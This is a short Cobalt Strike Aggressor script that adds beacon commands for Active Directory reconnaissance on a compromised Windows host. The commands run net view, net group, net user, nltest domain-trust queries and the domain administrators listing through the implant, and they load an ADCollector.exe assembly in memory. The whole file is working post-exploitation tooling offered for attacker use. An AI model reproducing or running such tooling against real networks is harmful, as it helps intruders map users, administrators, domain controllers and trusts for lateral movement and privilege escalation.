#    _    ____            _ _           _   _             
#   / \  |  _ \  ___ ___ | | | ___  ___| |_(_) ___  _ __  
#  / _ \ | | | |/ __/ _ \| | |/ _ \/ __| __| |/ _ \| '_ \ 
# / ___ \| |_| | (_| (_) | | |  __/ (__| |_| | (_) | | | |
#/_/   \_\____/ \___\___/|_|_|\___|\___|\__|_|\___/|_| |_|
#
# 							@lengyi 2020
#		        Some improvements by https://github.com/lengjibo
#
beacon_command_register("Get-Domain", "Get-Domain info\n");
beacon_command_register("Get-DomainGroup", "Get-DomainGroup info\n");
beacon_command_register("Get-DomainUser", "Get-DomainUser info\n");
beacon_command_register("Get-DomainADUser", "Get-DomainADUser info\n");
beacon_command_register("Get-DomainComputer", "Get-DomainComputer info\n");
beacon_command_register("Get-Domain_trusts", "Get-Domain_trusts info\n");
beacon_command_register("Get-DomainControllers", "Get-DomainControllers info\n");
beacon_command_register("Get-DomainAll", "Get-DomainAll info\n");

alias Get-Domain
{
	bshell($1, "net view /domain");
}
alias Get-DomainGroup
{
	bshell($1, "net group /domain");
}
alias Get-DomainComputer
{
	bshell($1, "net group \"domain computers\" /domain");
}
alias Get-Domain_trusts
{
	bshell($1, "nltest /domain_trusts");
}
alias Get-DomainControllers
{
	bshell($1, "net group \"Domain Controllers\" /domain");
}
alias Get-DomainUser
{
	bshell($1, "net user /domain");
}
alias Get-DomainADUser
{
	bshell($1, "net localgroup administrators /domain");
}
alias Get-DomainAll
{
	bexecute_assembly($1, script_resource("ADCollector.exe"));
}


